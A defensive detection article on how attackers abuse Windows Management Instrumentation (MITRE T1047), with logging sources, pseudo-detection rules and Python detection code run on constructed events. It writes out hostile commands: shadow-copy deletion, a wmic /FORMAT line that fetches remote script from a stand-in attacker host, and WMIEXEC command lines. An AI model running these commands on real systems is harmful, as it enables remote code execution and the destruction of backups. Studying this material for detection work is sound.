T1047-Windows Management Instrumentation
MITRE ATT&CK Technique: T1047-Windows Management Instrumentation. Detections, visibility, use cases and real-world attack insights.
Adversaries can abuse Windows Management Instrumentation (WMI) to run malicious commands on compromised systems. WMI, a core Windows feature for managing system components, allows both local and remote access via ports 135 (DCOM) and 5985/5986 (WinRM). Attackers use WMI to execute commands, deploy malicious code, or gather system data.
For example, they may use wmic.exe to delete shadow copies with the command wmic.exe Shadowcopy Delete. With wmic.exe deprecated in 2024, PowerShell and other interfaces such as the WMI COM APIs (from C++ or VBScript) are expected to take over as attackers' main ways of reaching WMI.
Malicious Objectives for Windows Management Instrumentation
Windows Management Instrumentation (WMI) is a native Windows feature commonly used on both local and remote systems. Administrators rely on WMI to:
configure system settings
execute processes or scripts
automate routine tasks
These capabilities, while beneficial for system management, also attract adversaries. Since WMI can operate across local and remote systems, attackers often exploit it for lateral movement. Additionally, because WMI is regularly used for legitimate purposes, malicious activity can easily blend in with normal system behavior, complicating detection efforts.
Mechanisms of Adversaries' Use of WMI
Adversaries frequently exploit Windows Management Instrumentation (WMI) to gain deeper access and control over compromised systems. One common method is the use of WMIC to enumerate and modify various components of a Windows environment. Attackers can determine which antivirus software is installed, disable firewall services, and even list group memberships, including local and domain administrator accounts. These capabilities allow them to prepare the environment for further malicious actions or evade security measures.
Beyond enumeration, adversaries can also tamper with recovery-related system components such as volume shadow copies.
For example:
Delete volume shadows: Attackers can use WMIC to delete volume shadow copies, which are crucial for system recovery.
Bypass security alerts: These actions are often executed without triggering typical security alerts, making it harder for defenders to detect malicious activity.
Obfuscate ransomware activity: Deleting volume shadows helps attackers prevent defenders from noticing ransomware-related actions.
Prevent file recovery: By using commands like wmic shadowcopy delete, adversaries remove backup copies, making it difficult to recover encrypted files.
Moreover, adversaries have been known to exploit WMIC's /format option in conjunction with XSL Script Processing to download and execute malicious scripts from remote locations. A command like wmic os get /FORMAT:"http://evilhacker.com/attacker.xsl" can effectively bypass security controls, allowing attackers to execute code hosted on external servers, further extending their control over the compromised environment.
Actions That Need to be Taken
Mitigating adversarial abuse of WMI is a complex challenge that requires careful consideration. While disabling the Winmgmt service might seem like an option, it’s generally not advisable. This is because many legitimate applications rely on WMI, and such a drastic action could disrupt critical system functionalities and lead to unforeseen issues.
To enhance security, administrators can restrict access to WMI namespaces, providing an additional layer of protection. However, since remote WMI access requires administrator privileges by default, it is already somewhat secured. Rather than trying to eliminate WMI abuse completely, security teams should focus on gathering relevant telemetry—such as that from AMSI—and developing reliable detection methods to identify WMI misuse effectively. This targeted approach allows organizations to address threats while maintaining the necessary operations of legitimate processes.
Visibility
Process Monitoring
Process telemetry is central to detecting WMI abuse. Unlike many other techniques, malicious WMI activity usually surfaces as either wmic.exe or wmiprvse.exe, and most harmful actions that use WMI originate from wmiprvse.exe. For example, if an attacker invokes the Create method of the Win32_Process class to move to another system, the new process will usually launch as a child of wmiprvse.exe on the targeted machine.
A potentially concerning child process of wmiprvse.exe is scrcons.exe. This executable is responsible for running scripts written in VBScript and JScript, especially when the ActiveScriptEventConsumer class is used for maintaining persistence. Although there are some legitimate reasons for scrcons.exe to run, it should be closely monitored for any suspicious behavior.
Command Monitoring
While some analytics focus mainly on the sequence of processes, many others combine process monitoring with command-line argument checks. Invocations of the Get-WMIObject PowerShell cmdlet are especially worth tracking as an indicator of WMI activity.
Detection Technology
Windows Event ID 4688: Process Creation
Enabling command-line logging for Windows Security Event ID 4688 provides a valuable telemetry source for identifying suspicious activity. This event captures critical details about process start events, allowing analysis of WMI and other activity. Once you have a solid understanding of the normal, benign behavior in your environment, it becomes much easier to separate genuine threats from false positives.
Sysmon Event IDs 19, 20, and 21: WmiEvents
Sysmon provides specific WMI event codes (19, 20, and 21) that are instrumental in monitoring malicious WMI activity. When enabled, Sysmon logs permanent WMI subscriptions in the Microsoft-Windows-Sysmon/Operational event log, capturing event filter creation (19), event consumer creation (20), and filter-to-consumer binding (21). While legitimate software may use these WMI features, such usage is rare and can be monitored closely to identify potential abuse.
Windows Event ID 5861: Microsoft-Windows-WMI-Activity/Operational
Event ID 5861 in the Microsoft-Windows-WMI-Activity/Operational event log consistently records permanent WMI event subscriptions. Such subscriptions serve as a primary method for adversaries to establish persistence via WMI. This persistence mechanism grants attackers significant control over the conditions under which their malicious payloads are executed.
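A binding (Sysmon Event ID 21) is only meaningful together with its filter (19) and consumer (20), so the telemetry above becomes actionable once the three are correlated into whole subscriptions. The following Python is an added example, not code from the original page: it joins constructed Sysmon-style records and flags bindings whose consumer runs script or command-line payloads, which is the same persistence that Event ID 5861 records. The field names (Name, Query, Type, Destination, Filter, Consumer, Operation) and the Type strings are assumptions modelled on Sysmon's WMI event schema.

```python
"""Correlate Sysmon WMI events (19 filter, 20 consumer, 21 binding) into complete
permanent subscriptions and flag those whose consumer executes code."""
import re

# Consumer kinds that run attacker-supplied code. The Type strings are assumed to
# match Sysmon's wording ("Script" = ActiveScriptEventConsumer, "Command Line" =
# CommandLineEventConsumer); adjust them to what your sensor actually emits.
RISKY_TYPES = {"Script", "Command Line"}
NAME_RE = re.compile(r'Name="([^"]+)"')   # Sysmon 21 refs look like __EventFilter.Name="X"

def ref_name(ref):
    """Return the object name from a Sysmon 21 Filter/Consumer reference."""
    m = NAME_RE.search(ref)
    return m.group(1) if m else ref

def correlate_subscriptions(events):
    """Join created filters and consumers through their bindings; one dict per binding."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19 and e["Operation"] == "Created"}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20 and e["Operation"] == "Created"}
    subs = []
    for e in events:
        if e["EventID"] != 21 or e["Operation"] != "Created":
            continue
        fname, cname = ref_name(e["Filter"]), ref_name(e["Consumer"])
        f, c = filters.get(fname, {}), consumers.get(cname, {})
        subs.append({"user": e["User"], "filter": fname, "consumer": cname,
                     "query": f.get("Query", "<filter not seen>"),
                     "type": c.get("Type", "<consumer not seen>"),
                     "destination": c.get("Destination", "")})
    return subs

def suspicious_subscriptions(events):
    """Bindings whose consumer runs code, or whose filter/consumer creation was never logged."""
    return [s for s in correlate_subscriptions(events)
            if s["type"] in RISKY_TYPES or s["type"].startswith("<") or s["query"].startswith("<")]

# Constructed sample events, not real telemetry
U = "CORP\\svc_deploy"
SAMPLE_EVENTS = [
    {"EventID": 19, "Operation": "Created", "User": U, "Name": "UpdaterFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Operation": "Created", "User": U, "Name": "UpdaterConsumer", "Type": "Script", "Destination": "<VBScript omitted>"},
    {"EventID": 21, "Operation": "Created", "User": U, "Filter": '__EventFilter.Name="UpdaterFilter"', "Consumer": 'ActiveScriptEventConsumer.Name="UpdaterConsumer"'},
    {"EventID": 19, "Operation": "Created", "User": U, "Name": "VolumeWatch", "Query": "SELECT * FROM Win32_VolumeChangeEvent"},
    {"EventID": 20, "Operation": "Created", "User": U, "Name": "VolumeLog", "Type": "Event Log", "Destination": "Application log (constructed)"},
    {"EventID": 21, "Operation": "Created", "User": U, "Filter": '__EventFilter.Name="VolumeWatch"', "Consumer": 'NTEventLogEventConsumer.Name="VolumeLog"'},
]
```

A binding whose filter or consumer creation was never logged is reported as well, because a gap in the 19/20 record is itself worth a look.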
Antimalware Scan Interface (AMSI) Telemetry
Endpoint security solutions that utilize AMSI event data can capture AMSI events associated with WMI tradecraft, including attempts at lateral movement and the establishment of permanent WMI event subscriptions. Additionally, AMSI is effective in identifying malicious usage of PowerShell's Get-WMIObject cmdlet.
Endpoint Detection and Response (EDR) Tools
An EDR tool serves as an invaluable asset for detecting adversaries exploiting Windows Management Instrumentation. This tool provides comprehensive visibility into a range of data sources, enhancing the ability of security teams to monitor and analyze endpoint activity effectively. The robust capabilities of EDR solutions equip organizations with the necessary insights to identify and respond to malicious behaviors efficiently.
Possible Use Cases
Suspicious Process Lineage
Trusted binaries and recognized administrative tools typically initiate WMI activity. Therefore, it is crucial to monitor for known malicious processes launching WMI or any deviations from expected behavior, such as a legitimate but atypical Windows binary initiating WMI or being spawned by it. The following is a compilation of various analytics designed to detect a broad spectrum of threats, including red team activities, web shells, and coinminers:
parent_process == wmiprvse.exe
&&
process == ('rundll32.exe' || 'msbuild.exe' || 'powershell.exe' || 'cmd.exe' || 'mshta.exe')
Suspicious Commands
Monitoring for suspicious command-line parameters is a reliable indicator of malicious activity. Various red team and post-exploitation frameworks spawn unique, unsigned binaries or commands remotely using the well-known wmic process call create invocation, and several detection methods built around it have proven effective at alerting us to related activity over the years. Potentially suspicious WMI command switches include create, node:, process, and call. However, the maliciousness of these commands is context-dependent, so the analytic may need tuning to keep false-positive volume manageable:
process == wmic.exe
&&
command_includes ('create' || 'node:' || 'process' || 'call')
Unusual Module Loads
Monitoring module loads can help identify a range of malicious activity, including defense evasion and credential theft. When adversaries use WMI for credential theft, investigate wmiprvse.exe (or its child processes) for unusual module loads such as samlib.dll or vaultcli.dll. WMI is also an effective mechanism for bypassing application controls, and adversaries, both real and simulated, are commonly observed using a WMI bypass technique referred to as "SquiblyTwo." The following pseudo-detection analytic is crafted to capture application control bypasses, but it can likely be adapted to other threats by substituting a different DLL or modifying the command:
process == wmic.exe
&&
command_includes ('format:')
&&
module_load == ('jscript.dll' || 'vbscript.dll')
Office Products Spawning WMI
The spawning of wmic.exe as a child process of Microsoft Office or similar products is nearly always indicative of malicious activity. Therefore, it is important to investigate the execution chain and subsequent activities in such cases. Below is a non-exhaustive example analytic designed to capture some of this activity:
parent_process == ('winword.exe' || 'excel.exe')
&&
process == wmic.exe
WMI Reconnaissance
Reconnaissance activities are more challenging to detect because they closely resemble typical administrative behavior. Nonetheless, we observe a significant volume of adversaries utilizing WMI to swiftly collect domain information, including details about users, groups, and computers within the domain. The following suggestions may assist in detecting related activities:
process == wmic.exe
&&
command_includes ('\ldap' || 'ntdomain')
Shadow Copy Deletion
Ransomware operators frequently utilize WMI to delete volume shadow copies, which greatly complicates the recovery of access to encrypted systems and files. To detect ransomware employing WMI for shadow copy deletion, consider monitoring for wmic.exe executions with command lines that include shadowcopy or delete.
process == wmic.exe
&&
command_includes ('shadowcopy' && 'delete')
Suspicious PowerShell Cmdlets
Numerous default PowerShell cmdlets enable administrators to leverage WMI through PowerShell. Both adversaries and administrators utilize these cmdlets to query the operating system or execute commands, whether locally or remotely. Cmdlets such as Get-WMIObject are commonly employed for reconnaissance activities.
process == powershell.exe
&&
command_includes ('invoke-wmimethod' || 'invoke-cimmethod' || 'get-wmiobject' || 'get-ciminstance' || 'wmiclass')
Real-life Example
APT41 evaluates an organization's network architecture to identify critical systems that facilitate further access. The group consistently pinpoints intermediary systems that grant entry to otherwise segmented areas of the network. Once these intermediary systems are identified, APT41 acts swiftly to compromise them.
APT41 employs multiple methods for lateral movement within an environment, including RDP sessions, leveraging stolen credentials, adding accounts to User and Admin groups, and utilizing password brute-forcing tools. The group may also use a compromised account to create scheduled tasks or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors. For example, APT41 can use a compromised account to create a scheduled task on a system, write a binary component of HIGHNOON containing the payload and command-and-control (C&C) information to disk, and modify the legitimate Windows WMI Performance Adapter (wmiApSrv) to execute the HIGHNOON payload.
APT41 frequently employs the publicly available utility WMIEXEC to facilitate lateral movement within an environment. WMIEXEC is a tool that enables the execution of WMI commands on remote machines.
cmd.exe /c whoami > C:\wmi.dll 2>&1
cmd.exe /c del C:\wmi.dll /F > nul 2>&1
cmd.exe /c a.bat > C:\wmi.dll 2>&1
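As an added example that is not part of the original page, the following Python applies the pseudo-analytics from the Possible Use Cases section to process-creation records, including a wmiprvse.exe to cmd.exe lineage of the kind WMIEXEC produces with the command lines just shown. The records are constructed dicts normalised from 4688 or Sysmon Event ID 1 data; the key names (process, parent_process, command_line, loaded_modules) are assumptions, and loaded_modules stands in for the separate module-load telemetry the SquiblyTwo analytic needs.

```python
"""Apply the pseudo-detection analytics from the use cases to process-creation records
normalised into dicts with keys process, parent_process, command_line, loaded_modules."""
import ntpath

WMIPRVSE_CHILDREN = {"rundll32.exe", "msbuild.exe", "powershell.exe", "cmd.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
WMIC_SWITCHES = ("create", "node:", "process", "call")
RECON_TERMS = ("\\ldap", "ntdomain")
SCRIPT_ENGINES = {"jscript.dll", "vbscript.dll"}
PS_WMI_CMDLETS = ("invoke-wmimethod", "invoke-cimmethod", "get-wmiobject",
                  "get-ciminstance", "wmiclass")

def evaluate(event):
    """Return the names of every analytic the record matches (empty list if none)."""
    proc = ntpath.basename(event["process"]).lower()        # 4688 logs full paths
    parent = ntpath.basename(event["parent_process"]).lower()
    cmd = event.get("command_line", "").lower()
    mods = {ntpath.basename(m).lower() for m in event.get("loaded_modules", [])}
    hits = []
    if parent == "wmiprvse.exe" and proc in WMIPRVSE_CHILDREN:
        hits.append("suspicious_process_lineage")
    if proc == "wmic.exe":
        if any(s in cmd for s in WMIC_SWITCHES):
            hits.append("suspicious_commands")          # noisy by design; tune per environment
        if "format:" in cmd and mods & SCRIPT_ENGINES:
            hits.append("unusual_module_loads")         # SquiblyTwo-style application control bypass
        if parent in OFFICE_PARENTS:
            hits.append("office_spawning_wmi")
        if any(t in cmd for t in RECON_TERMS):
            hits.append("wmi_reconnaissance")
        if "shadowcopy" in cmd and "delete" in cmd:
            hits.append("shadow_copy_deletion")
    if proc == "powershell.exe" and any(c in cmd for c in PS_WMI_CMDLETS):
        hits.append("suspicious_powershell_cmdlets")
    return hits

# Constructed sample records, not real telemetry
WMIC, CMD = r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"process": WMIC, "parent_process": CMD, "command_line": "wmic.exe shadowcopy delete"},
    {"process": WMIC, "parent_process": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": 'wmic os get /FORMAT:"http://evilhacker.com/attacker.xsl"',
     "loaded_modules": [r"C:\Windows\System32\jscript.dll"]},
    {"process": CMD, "parent_process": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd.exe /c whoami > C:\wmi.dll 2>&1"},
    {"process": WMIC, "parent_process": CMD, "command_line": "wmic ntdomain get domainname"},
    # benign inventory query that still trips the 'process' switch: tune rather than drop the rule
    {"process": WMIC, "parent_process": CMD, "command_line": "wmic process list brief"},
]
```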